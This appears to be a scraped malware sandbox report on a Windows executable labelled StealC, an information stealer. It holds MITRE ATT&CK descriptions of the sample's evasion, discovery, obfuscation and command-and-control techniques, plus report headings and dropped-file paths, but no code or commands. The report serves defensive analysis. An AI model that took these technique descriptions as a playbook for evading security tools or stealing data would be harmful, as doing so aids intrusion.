Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Aew8SXjXEb.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Aew8SXjXEb.exe_f6e7fff469788cb2a77365499845ec8544602f72_b1bf4f91_064bad09-4bab-48b2-ad3d-1b452802d532\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER53B.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B9.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E9.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Windows Analysis Report
Aew8SXjXEb.exe

Function 00622021 Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 631
memoryCOMMON

Function 00636368 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
COMMONLIBRARYCODE

Function 00638E2E Relevance: 4.7, APIs: 3, Instructions: 202
COMMON

Function 0063A3A6 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Function 00639FAA Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Function 0063C9E9 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183
COMMONLIBRARYCODE